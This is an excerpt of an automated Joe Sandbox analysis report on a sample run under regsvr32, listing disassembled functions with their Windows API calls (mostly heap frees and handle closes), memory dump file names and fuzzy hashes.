Opcode Fuzzy Hash: 2e9a52ca18bec02b22c481d5ca1bd2ddd153f91ff1a5b4f20d3e47ea1b827125
Instruction Fuzzy Hash: 4D518E2290EFC1A9F7259F29D8413F923B0FF98798F04A132DE4D87696DF399295C200

Function 00007FF8A93062F9 Relevance: 8.9, APIs: 7, Instructions: 111memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307E38
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 0aa10d7b45793d7c457eb5ce1731c201a058b9d98b1022bc5ae6d7fb2b80b05d
Instruction ID: 9bb4f9c3a25de94ad0c88fd1ba95ba41e2e89f40f96de4f209742df5849be851
Opcode Fuzzy Hash: 0aa10d7b45793d7c457eb5ce1731c201a058b9d98b1022bc5ae6d7fb2b80b05d
Instruction Fuzzy Hash: DD415D21A0EEC6A0FA64AF92D4443FE6271FF897C4F4460B2D94ECA796CF7DE4409201

Function 00007FF8A9307B1A Relevance: 8.8, APIs: 7, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307E38

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 2e50c01301b51803ab56fd2a565973fa80ab45543efb3dbfa58ef23b0b9aeda5
Instruction ID: 85da8f5ec0df730f8608f09914f5ee7fd0f71d15e30804808d37b6fa678ac157
Opcode Fuzzy Hash: 2e50c01301b51803ab56fd2a565973fa80ab45543efb3dbfa58ef23b0b9aeda5
Instruction Fuzzy Hash: 41412A2590EEC2A0F664EF91E4543FE6271FF883C4F446076D94EC6A96CF7EE4449201

Function 00007FF8A9306283 Relevance: 8.8, APIs: 7, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307E38

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 304b5454b878c1e03bae65f248f81afd71450d8e23e91084cab92b59b036a074
Instruction ID: 8d0c1ec581a2b57112ba216f184940d11d5bae0be57bdf931c9a5a9268b7c4fb
Opcode Fuzzy Hash: 304b5454b878c1e03bae65f248f81afd71450d8e23e91084cab92b59b036a074
Instruction Fuzzy Hash: A4410C2590FEC2A0F664EF91A4543FA6271FF897C4F4460B2D94ECAA96CF7EE4449201

Function 00007FF8A9306278 Relevance: 8.8, APIs: 7, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307E38

Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930178D
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017BD
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A93017D8
Part of subcall function 00007FF8A9301770: HeapFree.KERNEL32 ref: 00007FF8A930180E
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301824
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A930183A
Part of subcall function 00007FF8A9301770: CloseHandle.KERNEL32 ref: 00007FF8A9301853

Part of subcall function 00007FF8A9301660: HeapFree.KERNEL32 ref: 00007FF8A930167B

HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 1e38ab8799f5a5df02ed6e2b51670d440cad116fd3ef1fe49e1db53c2ef50988
Instruction ID: 8d0c1ec581a2b57112ba216f184940d11d5bae0be57bdf931c9a5a9268b7c4fb
Opcode Fuzzy Hash: 1e38ab8799f5a5df02ed6e2b51670d440cad116fd3ef1fe49e1db53c2ef50988
Instruction Fuzzy Hash: A4410C2590FEC2A0F664EF91A4543FA6271FF897C4F4460B2D94ECAA96CF7EE4449201

Function 00007FF8A9307DF7 Relevance: 8.8, APIs: 7, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9307E1F
HeapFree.KERNEL32 ref: 00007FF8A9308006
HeapFree.KERNEL32 ref: 00007FF8A93081FF
HeapFree.KERNEL32 ref: 00007FF8A9308220
HeapFree.KERNEL32 ref: 00007FF8A9308241
HeapFree.KERNEL32 ref: 00007FF8A930859B
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 178292386a68b8ec089d2dd31a8c0c2f9bdb03057151cb47c3826666d60be7cf
Instruction ID: 1609f4974817f9060e781b887503b36a4cb08e29e469eec98918aa1ad8673af8
Opcode Fuzzy Hash: 178292386a68b8ec089d2dd31a8c0c2f9bdb03057151cb47c3826666d60be7cf
Instruction Fuzzy Hash: 75312C21D0FDC2A0F664EF9298543FA5271EF887C4F4460B2D94ECAA96CF6EE4449201

Function 00007FF8A930817A Relevance: 8.8, APIs: 7, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308192

Part of subcall function 00007FF8A933D2C0: HeapFree.KERNEL32(?,?,?,?), ref: 00007FF8A933D30C

Part of subcall function 00007FF8A9354020: RtlCaptureContext.NTDLL ref: 00007FF8A93540B2
Part of subcall function 00007FF8A9354020: RtlUnwindEx.KERNEL32 ref: 00007FF8A93540EF
Part of subcall function 00007FF8A9354020: abort.MSVCRT ref: 00007FF8A93540F5
Part of subcall function 00007FF8A9354020: RaiseException.KERNEL32 ref: 00007FF8A9354132

HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CaptureContextExceptionRaiseUnwindabort
String ID:
API String ID: 390735245-0
Opcode ID: dec83771c7850586c5774a580664e8509a961e8dc9a0aa6967c86cdc05120f80
Instruction ID: 93687527e7afbef18394b1f1c5be6a7186709d6b8577d3fee8b17ffc50ad2627
Opcode Fuzzy Hash: dec83771c7850586c5774a580664e8509a961e8dc9a0aa6967c86cdc05120f80
Instruction Fuzzy Hash: 26310D2190EEC2A0F624EF56A4543FA62B1EFC87C4F446075D64ECA696CF7EE4449601

Function 00007FF8A9308119 Relevance: 8.8, APIs: 7, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A93084FC
HeapFree.KERNEL32 ref: 00007FF8A9308535
HeapFree.KERNEL32 ref: 00007FF8A9308548
HeapFree.KERNEL32 ref: 00007FF8A9308569
HeapFree.KERNEL32 ref: 00007FF8A93086A5
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: c71f0be3b8559fc462b9cf001558c0019377f2d9328ef840efcbb9c35b35ae5d
Instruction ID: 512bb1b06bc5df87df83392999464b34d92d07ec00e814f6b3bf59298bf11e63
Opcode Fuzzy Hash: c71f0be3b8559fc462b9cf001558c0019377f2d9328ef840efcbb9c35b35ae5d
Instruction Fuzzy Hash: A0312C2190EEC2A0F624EF52A4543FA6271EFC87C4F446076D54ECA69ACF7EE0449601

Function 00007FF8A93082B2 Relevance: 8.8, APIs: 7, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308735
HeapFree.KERNEL32 ref: 00007FF8A930874B
HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: 79f5d7ea7e016a49f7a9eac2075096672de05b9fd42a1db46e83678227cd77cd
Instruction ID: f77884360f25bc978e580411234362a20b31705c8190520e2a0b8d4f9d0fd798
Opcode Fuzzy Hash: 79f5d7ea7e016a49f7a9eac2075096672de05b9fd42a1db46e83678227cd77cd
Instruction Fuzzy Hash: 2C31501190EEC2A0F660EF56D4143FAA3B1EFC8BC4F446071D54DC6AAADF7DE4448601

Function 00007FF8A93083B3 Relevance: 8.8, APIs: 7, Instructions: 59memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A9308735
HeapFree.KERNEL32 ref: 00007FF8A930874B
HeapFree.KERNEL32 ref: 00007FF8A9308776
HeapFree.KERNEL32 ref: 00007FF8A93087AE
CloseHandle.KERNEL32 ref: 00007FF8A93087B8
HeapFree.KERNEL32 ref: 00007FF8A93087D9
HeapFree.KERNEL32 ref: 00007FF8A93087FA

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$CloseHandle
String ID:
API String ID: 1910495013-0
Opcode ID: bc84975b13c6fae6b5ff355b2ec5ccba9f937ebea97734e2cdaeed065c62a359
Instruction ID: b9f44a44f5514f8edebc8339607f13a39bd9a205fb2f140d7a9d583c4daff287
Opcode Fuzzy Hash: bc84975b13c6fae6b5ff355b2ec5ccba9f937ebea97734e2cdaeed065c62a359
Instruction Fuzzy Hash: 63312F2190EEC2A0E664EF56D4543FAA3B1EFC87C4F446071DA4DC6AAADF7DE444C601

Function 00007FF8A933CFD1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39memorylibraryloaderCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A933CFEA
GetModuleHandleA.KERNEL32 ref: 00007FF8A933D018
GetProcAddress.KERNEL32 ref: 00007FF8A933D02C

Strings

GetTempPath2W, xrefs: 00007FF8A933D022
kernel32, xrefs: 00007FF8A933D011

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: AddressFreeHandleHeapModuleProc
String ID: GetTempPath2W$kernel32
API String ID: 2247350619-407914046
Opcode ID: 4e62d5408f5826f86271076a09bcfa47aa4c1ea2a890b77d01f21ec99e8ade96
Instruction ID: 4370af34600e103481d863b1b24cc6aacb4db3762a160454f8686ec0b11b38f5
Opcode Fuzzy Hash: 4e62d5408f5826f86271076a09bcfa47aa4c1ea2a890b77d01f21ec99e8ade96
Instruction Fuzzy Hash: 87015A51E4FEC6B9FA149F51A8443F962B1EF88BC0F546439ED1D837959E3CE546C200

Function 00007FF8A932A9B0 Relevance: 7.6, APIs: 6, Instructions: 110memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF8A9331300: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF8A9328942), ref: 00007FF8A9331331

HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: 1c0cb24cde47dd918f50265b453517ff52207aff264f6ed731c4727e70c657b2
Instruction ID: 202481c69e6d3b8590a4f5bdf9af964ac9be63e6fff743603fdb239a625523f0
Opcode Fuzzy Hash: 1c0cb24cde47dd918f50265b453517ff52207aff264f6ed731c4727e70c657b2
Instruction Fuzzy Hash: CF516D2290EFC1A9F7659F29D9413F923B0FF98798F04A132DE4D87696DF399295C200

Function 00007FF8A932A9BE Relevance: 7.6, APIs: 6, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246767584.00007FF8A939A000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246789441.00007FF8A939D000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff8a9300000_regsvr32.jbxd

Similarity

API ID: FreeHeap$memcpy
String ID:
API String ID: 1887603139-0
Opcode ID: b796b53730dd34d750746877530bfa6e18f21d3a974efa5f9ccb9c5342f488ba
Instruction ID: 6281302f7240ee73de33bf869ea76ea718f79ae5604c967997288ee0331bcebf
Opcode Fuzzy Hash: b796b53730dd34d750746877530bfa6e18f21d3a974efa5f9ccb9c5342f488ba
Instruction Fuzzy Hash: A6516E2290EFC1A6F7259F2999413F923B0FF98798F04A132DE4D87695DF399295C200

Function 00007FF8A932A9C8 Relevance: 7.6, APIs: 6, Instructions: 108memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32 ref: 00007FF8A932AA65
HeapFree.KERNEL32 ref: 00007FF8A932AA92
HeapFree.KERNEL32 ref: 00007FF8A932AAA9
HeapFree.KERNEL32 ref: 00007FF8A932AAC8
HeapFree.KERNEL32 ref: 00007FF8A932AAF5
memcpy.MSVCRT ref: 00007FF8A932ABDC

Memory Dump Source

Source File: 00000006.00000002.3246614456.00007FF8A9301000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8A9300000, based on PE: true

Associated: 00000006.00000002.3246590829.00007FF8A9300000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246657948.00007FF8A9372000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9373000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246676681.00007FF8A9392000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246720931.00007FF8A9398000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.3246742082.00007FF8A9399000.00000004.00000001.01000000.00000009.sdmpDownload File
